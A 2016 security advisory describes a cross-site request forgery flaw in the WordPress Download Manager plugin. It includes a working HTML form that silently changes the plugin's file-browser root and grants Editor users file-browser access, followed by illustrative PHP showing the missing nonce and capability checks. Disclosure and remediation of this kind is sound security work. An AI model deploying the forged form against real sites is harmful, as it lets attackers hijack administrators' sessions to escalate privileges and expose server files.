Advisory

Burak Kelebek, July 2016

Cross-Site Request Forgery in WordPress Download Manager Plugin

Abstract

A Cross-Site Request Forgery vulnerability has been found in the WordPress Download Manager plugin. By exploiting this vulnerability, an attacker can change confidential settings of the plugin.

OVE ID

OVE-20160722-0005

Tested versions

This issue was successfully tested on WordPress Download Manager version 2.8.99.

Fix

There is currently no fix available.

Introduction

WordPress Download Manager is a files/documents management plugin and complete e-commerce solution for selling digital products. It helps you manage, track and control file downloads and sell digital products from your WordPress site. Password protection and user-role protection control access to your files, and you set prices when you need to sell a digital item. Users can directly download free items; when an item has a price, the user goes through the cart and checkout. The checkout is kept as simple as possible to give the user a better purchasing experience, which increases the probability that an order is completed: rather than trying to convince the customer to buy something, cart optimisation is best seen as removing barriers to that goal.

It was discovered that WordPress Download Manager is vulnerable to Cross-Site Request Forgery.

Details

The Download Manager plugin lacks a CSRF (nonce) token on the request that saves its settings. Because of this, an attacker can change confidential settings such as file browser access and the file browser base directory by luring a logged-in administrator into following a malicious link that contains the proof of concept below.

Proof of concept

The proof of concept below gives file browser access to a user with Editor privileges:

<html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="task" value="wdm_save_settings"/>
         <input type="hidden" name="action" value="wdm_settings"/>
         <input type="hidden" name="section" value="basic"/>
         <input type="hidden" name="wpdm_permission_msg" value="Access Denied"/>
         <input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a>&#10;"/>
         <input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/>
         <input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/>
         <input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/>
         <input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
         <input type="hidden" name="__wpdm_download_speed" value="4096"/>
         <input type="hidden" name="__wpdm_download_resume" value="1"/>
         <input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
         <input type="hidden" name="__wpdm_open_in_browser" value="0"/>
         <input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
         <input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
         <input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
         <input type="hidden" name="__wpdm_login_url" value=""/>
         <input type="hidden" name="__wpdm_register_url" value=""/>
         <input type="hidden" name="__wpdm_user_dashboard" value=""/>
         <input type="submit"/>
      </form>
   </body>
</html>
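The missing control is a per-user nonce check on the server side, which is what turns the form above into a no-op. The handler below is an added illustration written for this advisory, not the Download Manager plugin's own source: it shows the shape of a hardened settings endpoint in WordPress. The hook name wp_ajax_wdm_settings follows from the action=wdm_settings parameter in the proof of concept (admin-ajax.php dispatches a POST with action=X to the wp_ajax_X hook for logged-in users); the function names, the nonce action string wdm_save_settings, the nonce field name _wpdm_nonce and the per-setting sanitisers are assumptions, and the internal task parameter is dropped for brevity.

```php
<?php
/**
 * Hypothetical hardened settings handler for a WordPress plugin.
 * Illustrative code written for this advisory; NOT the Download Manager
 * plugin's source. Hook, option and function names are assumed.
 */

// 1. When rendering the settings form, emit a nonce bound to this action
//    and to the current user's session. A cross-origin attacker page cannot
//    read this value, so its forged form cannot supply it.
function wdm_example_render_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    wp_nonce_field( 'wdm_save_settings', '_wpdm_nonce' );
    echo '<input type="hidden" name="action" value="wdm_settings" />';
    echo '<input type="text" name="_wpdm_file_browser_root" value="'
        . esc_attr( get_option( '_wpdm_file_browser_root', '' ) ) . '" />';
    // ... remaining settings fields ...
    submit_button();
    echo '</form>';
}

// 2. The AJAX handler. The vulnerable pattern is to copy $_POST straight
//    into update_option(); the two checks at the top are what the advisory
//    reports as missing.
function wdm_example_save_settings() {
    // Authorisation: only users allowed to manage options may change them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }

    // Anti-CSRF: verifies $_POST['_wpdm_nonce'] against the
    // 'wdm_save_settings' action for the current user. On a missing or
    // invalid nonce it terminates the request, so a forged submission
    // never reaches the writes below.
    check_ajax_referer( 'wdm_save_settings', '_wpdm_nonce' );

    // Whitelist of settings this handler may write, each with a sanitiser.
    $allowed = array(
        '_wpdm_file_browser_root'   => 'sanitize_text_field',
        '_wpdm_file_browser_access' => 'wdm_example_sanitize_roles',
        '__wpdm_download_speed'     => 'absint',
        '__wpdm_open_in_browser'    => 'absint',
    );

    foreach ( $allowed as $key => $sanitize ) {
        if ( isset( $_POST[ $key ] ) ) {
            update_option( $key, call_user_func( $sanitize, wp_unslash( $_POST[ $key ] ) ) );
        }
    }

    wp_send_json_success( array( 'message' => 'Settings saved' ) );
}

// Only role slugs that actually exist on this site may be granted
// file-browser access.
function wdm_example_sanitize_roles( $roles ) {
    $roles = is_array( $roles ) ? $roles : array();
    $valid = array_keys( wp_roles()->roles );
    return array_values( array_intersect( array_map( 'sanitize_key', $roles ), $valid ) );
}

// Registered for logged-in users only (no wp_ajax_nopriv_ variant), so an
// anonymous request gets WordPress's default "0" response.
add_action( 'wp_ajax_wdm_settings', 'wdm_example_save_settings' );
```

Two design points matter here. The capability check runs before the nonce check so that an unprivileged but logged-in user gets a clear 403 rather than a nonce failure, and the nonce is tied both to an action string and to the user's session, which is why a value harvested from one administrator's page cannot be replayed against another. With these checks in place, the proof-of-concept form above is rejected by check_ajax_referer() before any option is written.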
